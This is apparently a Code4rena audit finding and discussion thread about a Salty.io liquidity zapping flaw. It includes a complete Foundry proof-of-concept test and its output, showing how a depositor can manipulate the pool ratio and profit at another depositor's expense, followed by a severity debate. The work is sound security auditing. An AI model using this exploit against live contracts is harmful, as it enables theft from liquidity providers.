code-423n4 / 2024-03-saltyio-mitigation-findings

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Adding liquidity with `useZapping = true` allows user to steal funds #127

Open c4-bot-2 opened 7 months ago

c4-bot-2 commented 7 months ago

Lines of code

Vulnerability details


The function depositLiquidityAndIncreaseShare() can be called with useZapping = true which internally swaps one token to another in order to maintain the correct ratio and then makes the deposit. This can be exploited to gain funds.


The protocol has taken important steps which either make a traditional sandwich attack unprofitable for the attacker or impossible to execute altogether. These are -

These constraints are however bypassed by calling the function depositLiquidityAndIncreaseShare() with useZapping = true.

Instead of doing a front-run-swap, simply let the zapping feature do it for you. This internal swap is not recorded as an actual "swap" by the protocol and hence when later on a back-run-swap is executed, it's not reverted in spite of being in the same block. Additionally, arbitrage no longer occurs when zapping liquidity, as implemented in this PR. So you have now bypassed AAA as well.

Attack Scenario


Bob can steal funds from Charlie and profit.

Proof of Concept

Click to view PoC Create a new file `src/staking/tests/ZapSwap.t.sol` with the following code and run via `COVERAGE="yes" NETWORK="sep" forge test -vv --rpc-url --mt test_t0x1c_ZapSwapGain`: ```js // SPDX-License-Identifier: Unlicensed pragma solidity =0.8.22; import "../../dev/Deployment.sol"; contract ZapSwap is Deployment { bytes32[] public poolIDs; bytes32 public pool1; IERC20 public token1; IERC20 public token2; address public constant alice = address(0x1111); address public constant bob = address(0x2222); address public constant charlie = address(0x3333); uint256 token1DecimalPrecision; uint256 token2DecimalPrecision; function setUp() public { // If $COVERAGE=yes, create an instance of the contract so that coverage testing can work // Otherwise, what is tested is the actual deployed contract on the blockchain (as specified in Deployment.sol) if ( keccak256(bytes(vm.envString("COVERAGE" ))) == keccak256(bytes("yes" ))) initializeContracts(); grantAccessAlice(); grantAccessBob(); grantAccessCharlie(); grantAccessDeployer(); grantAccessDefault(); finalizeBootstrap(); vm.prank(address(daoVestingWallet)); salt.transfer(DEPLOYER, 1000000 ether); token1DecimalPrecision = 18; token2DecimalPrecision = 18; token1 = new TestERC20("TEST", token1DecimalPrecision); token2 = new TestERC20("TEST", token2DecimalPrecision); pool1 = PoolUtils._poolID(token1, token2); poolIDs = new bytes32[](1); poolIDs[0] = pool1; // Whitelist the _pools vm.startPrank( address(dao) ); poolsConfig.whitelistPool(token1, token2); vm.stopPrank(); vm.prank(DEPLOYER); salt.transfer( address(this), 100000 ether ); salt.approve(address(liquidity), type(uint256).max); vm.startPrank(alice); token1.approve(address(liquidity), type(uint256).max); token2.approve(address(liquidity), type(uint256).max); vm.stopPrank(); vm.startPrank(bob); token1.approve(address(liquidity), type(uint256).max); token2.approve(address(liquidity), type(uint256).max); token1.approve(address(pools), type(uint256).max); token2.approve(address(pools), type(uint256).max); vm.stopPrank(); vm.startPrank(charlie); token1.approve(address(liquidity), type(uint256).max); token2.approve(address(liquidity), type(uint256).max); token1.approve(address(pools), type(uint256).max); token2.approve(address(pools), type(uint256).max); vm.stopPrank(); // DAO gets some salt and pool lps and approves max to staking token1.transfer(address(dao), 1000 * 10**token1DecimalPrecision); token2.transfer(address(dao), 1000 * 10**token2DecimalPrecision); vm.startPrank(address(dao)); token1.approve(address(liquidity), type(uint256).max); token2.approve(address(liquidity), type(uint256).max); vm.stopPrank(); } // Convenience function function totalSharesForPool( bytes32 poolID ) public view returns (uint256) { bytes32[] memory _pools2 = new bytes32[](1); _pools2[0] = poolID; return liquidity.totalSharesForPools(_pools2)[0]; } function test_t0x1c_ZapSwapGain() public { // ******************************* SETUP ************************************** // Give Alice, Bob & Charlie some tokens for testing token1.transfer(alice, 100 ether); token2.transfer(alice, 100 ether); token1.transfer(bob, 1 ether); token2.transfer(bob, 1 ether); token1.transfer(charlie, 100 ether); token2.transfer(charlie, 100 ether); assertEq(totalSharesForPool( pool1 ), 0, "Pool should initially have zero liquidity share" ); assertEq(liquidity.userShareForPool(alice, pool1), 0, "Bob's initial liquidity share should be zero"); assertEq(liquidity.userShareForPool(bob, pool1), 0, "Bob's initial liquidity share should be zero"); assertEq(liquidity.userShareForPool(charlie, pool1), 0, "Charlie's initial liquidity share should be zero"); assertEq( token1.balanceOf( address(pools)), 0, "liquidity should start with zero token1" ); assertEq( token2.balanceOf( address(pools)), 0, "liquidity should start with zero token2" ); // deposit ratio of 1:1 i.e token1's price is 1 times that of token2 uint256 addedAmount1 = 100 ether; uint256 addedAmount2 = 100 ether; // Alice adds liquidity in the correct ratio, as the first depositor vm.prank(alice); uint256 addedLiquidityAlice = liquidity.depositLiquidityAndIncreaseShare( token1, token2, addedAmount1, addedAmount2, addedAmount1, addedAmount2, addedAmount1 + addedAmount2, block.timestamp, false ); console.log("initial balances: token1 = %s, token2 = %s", token1.balanceOf( address(pools)), token2.balanceOf( address(pools))); emit log_named_decimal_uint ("Initial ratio of token2:token1 =", 1e18 * token2.balanceOf(address(pools)) / token1.balanceOf(address(pools)), 18); assertEq(liquidity.userShareForPool(alice, pool1), addedLiquidityAlice, "Alice's share should have increased" ); assertEq( token1.balanceOf( address(pools)), addedAmount1, "Tokens were not deposited into the pool as expected" ); assertEq( token2.balanceOf( address(pools)), addedAmount2, "Tokens were not deposited into the pool as expected" ); assertEq(totalSharesForPool( pool1 ), addedLiquidityAlice, "totalShares mismatch after Alice's deposit" ); uint256 bobInitialBalance = token1.balanceOf(bob) + token2.balanceOf(bob); // In Dollar terms // ******************************* SETUP ENDS ************************************** console.log("\n\n***************************** Bob Zap-Swap Attack ************************************\n"); vm.prank(bob); uint256 addedLiquidityBob = liquidity.depositLiquidityAndIncreaseShare( token1, token2, 1 ether, 0, 0, 0, 0, block.timestamp, true ); console.log("new balances: token1 = %s, token2 = %s", token1.balanceOf( address(pools)), token2.balanceOf( address(pools))); emit log_named_decimal_uint ("Manipulated ratio of token2:token1 =", 1e18 * token2.balanceOf(address(pools)) / token1.balanceOf(address(pools)), 18); // Charlie transaction goes through now which adds liquidity with suitable slippage parameters vm.prank(charlie); // @audit-info : 1% slippage for token2 liquidity.depositLiquidityAndIncreaseShare( token1, token2, 100 ether, 100 ether, 100 ether, 99 ether, 199 ether, block.timestamp, false ); // Bob swaps vm.prank(bob); (uint256 swappedOut) = pools.depositSwapWithdraw(token2, token1, 1 ether, 0, block.timestamp); emit log_named_decimal_uint("token1 swappedOut in exchange for 1 ether of token2 (should be greater than 1 ether) =", swappedOut, 18); skip(1 hours); vm.prank(bob); liquidity.withdrawLiquidityAndClaim(token1, token2, addedLiquidityBob, 0, 0, block.timestamp); uint256 bobFinalBalance = token1.balanceOf(bob) + token2.balanceOf(bob); // In Dollar terms assertGt( bobFinalBalance, bobInitialBalance, "Bob did not profit" ); console.log("\nProfit made by Bob = $", bobFinalBalance - bobInitialBalance); } } ```


[PASS] test_t0x1c_ZapSwapGain() (gas: 947570)
  initial balances: token1 = 100000000000000000000, token2 = 100000000000000000000
  Initial ratio of token2:token1 =: 1.000000000000000000

***************************** Bob Zap-Swap Attack ************************************

  new balances: token1 = 100999999999999999999, token2 = 100000000000000000000
  Manipulated ratio of token2:token1 =: 0.990099009900990099

  token1 swappedOut in exchange for 1 ether of token2 (should be greater than 1 ether) =: 1.004950249987624375

Profit made by Bob = $ 2462673092946115

Recommended Mitigation Steps

The useZapping = true option gives users the power to perform multiple actions which are otherwise actively blocked by the protocol individually. I would recommend to remove the zap functionality altogether. Removing this along with the fixes proposed in the following bug reports + the newly added features by the protocol should be sufficient to thwart any sandwich attacks via reserve ratio manipulation:

Assessed type


Picodes commented 6 months ago

This report shows how some restrictions can be bypassed by using depositLiquidityAndIncreaseShare

piken commented 6 months ago

This issue appears to be a classic sandwich attack. However, it should be acceptable as long as it doesn't exceed the slippage tolerance.

t0x1cC0de commented 6 months ago

The slippage provided by Charlie, or for that matter by any user in any protocol is to accommodate for price fluctuations due to real market change in token value which may manifest itself in form of swaps or similar action of other participants. Presence of slippage in Charlie's call does not mean his exposure to price manipulation by Bob is to be considered acceptable in any way, even if it's within provided slippage limits.

It's akin to the protocol saying to Charlie, "You were okay with losing 1% to market fluctuations and real price volatility, so you might as well be okay with losing to a hack even though the market fluctuations were non-existent today".

For that reason, I believe this and the other High severity reports raised by me around a non-typical sandwich attack should be considered valid. Please refer my comments in #108 too.

c4-sponsor commented 6 months ago

othernet-global (sponsor) disputed

othernet-global commented 6 months ago

Charlie wanted to deposit 100 token1 and 100 token2 for 200 liquidity. Instead they are depositing 100 token1 and 99.0099 token for 199.0074 liquidity.

They are depositing less and are getting a very close amount of liquidity to what they would expect.

If, after the attack Charlie withdraws their tokens, they still have 199.99753719 of token1 and token2 which is acceptably close to the 200 they started with.

c4-judge commented 6 months ago

Picodes changed the severity to 2 (Med Risk)

c4-judge commented 6 months ago

Picodes marked the issue as satisfactory

c4-judge commented 6 months ago

Picodes marked the issue as selected for report